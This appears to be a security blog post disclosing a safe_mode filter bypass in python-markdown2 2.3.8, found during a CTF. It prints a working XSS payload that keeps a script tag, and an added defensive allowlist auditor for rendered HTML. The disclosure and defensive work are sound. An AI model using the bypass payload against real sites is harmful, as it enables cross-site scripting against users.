[python-markdown2] safe_mode Filter Bypass Analysis
![Image](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMVMMOjc1tDQUfFdOn7_0TPSnoBap_rQHaOV4HZ85rLirdI-dM_HPE0kMoLab_mN4hDOSVnMPALLwZ-VcVS2lmp7ni0jjFk2SbdQB-tBBLEQgIRPkeB5yRj5isSyq8KV_pNE8RmhNxVyI/s640/%25E1%2584%2589%25E1%2585%25B3%25E1%2584%258F%25E1%2585%25B3%25E1%2584%2585%25E1%2585%25B5%25E1%2586%25AB%25E1%2584%2589%25E1%2585%25A3%25E1%2586%25BA+2020-04-12+%25E1%2584%258B%25E1%2585%25A9%25E1%2584%2592%25E1%2585%25AE+6.06.49.png)
Overview

* Version at the time of writing: 2.3.8 ( https://github.com/trentm/python-markdown2/tree/4d2fc792abd7fbf8ddec937812857f13fded61cf )

While playing a CTF, I noticed that the challenge used the markdown2 module, so I looked into the module and found the issue below.

https://github.com/trentm/python-markdown2/issues/341

Filter Bypass ????!!

- Expected Result

```python
>>> import markdown2
>>> markdown2.markdown("[<script>alert(1)</script>]()", safe_mode=True)
'<p><a href="#">[HTML_REMOVED]alert(1)[HTML_REMOVED]</a></p>\n'
```

- Issue Payload

```python
>>> import markdown2
>>> markdown2.markdown('<http://g<!s://q?<!-<[<script>alert(1);/\*](http://g)->a><http://g<!s://g.c?<!-<[a\\*/</script>alert(1);/*](http://g)->a>', safe_mode=True)
'<p><http://g<!s://q?<!-<<a href="http://g"><script>alert(1);/*</a>->a><http://g<!s://g.c?<!-<<a href=&
```
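
Since the issue output above still carries a `<script>` tag despite `safe_mode=True`, one defensive option is to audit the rendered HTML against an allowlist before serving it, independent of the Markdown library's own filter. This is an added example, not code from the original post or from python-markdown2; the allowlist, the names `RenderedHtmlAuditor`, `audit_rendered_html` and `is_safe_to_serve`, and the second sample string are assumptions constructed for illustration.

```python
from html.parser import HTMLParser

# Assumed allowlist for rendered Markdown; extend it for the features you enable.
ALLOWED_TAGS = {"p", "a", "em", "strong", "code", "pre", "ul", "ol", "li",
                "blockquote", "h1", "h2", "h3", "br", "hr"}
ALLOWED_ATTRS = {"a": {"href", "title"}}
ALLOWED_URL_PREFIXES = ("http://", "https://", "mailto:", "#", "/")

# Output the post lists as the expected safe_mode result.
PAGE_EXPECTED_OUTPUT = '<p><a href="#">[HTML_REMOVED]alert(1)[HTML_REMOVED]</a></p>\n'
# Constructed sample: rendered HTML in which a script tag survived filtering.
CONSTRUCTED_UNFILTERED_OUTPUT = '<p><a href="http://g"><script>alert(1);</script></a></p>\n'


class RenderedHtmlAuditor(HTMLParser):
    """Records every tag, attribute or link target outside the allowlist."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.violations = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag and attribute names before calling this.
        if tag not in ALLOWED_TAGS:
            self.violations.append(("tag", tag))
            return
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                self.violations.append(("attr", f"{tag}[{name}]"))
            elif name == "href":
                url = (value or "").strip().lower()
                if url and not url.startswith(ALLOWED_URL_PREFIXES):
                    self.violations.append(("url", url))


def audit_rendered_html(html):
    """Return a list of (kind, detail) violations; an empty list means clean."""
    auditor = RenderedHtmlAuditor()
    auditor.feed(html)
    auditor.close()
    return auditor.violations


def is_safe_to_serve(html):
    """Fail closed: any violation means the output is rejected."""
    return not audit_rendered_html(html)
```

`html.parser` does not parse malformed markup exactly as a browser does, so in production this check belongs in a maintained allowlist sanitizer applied to the rendered output.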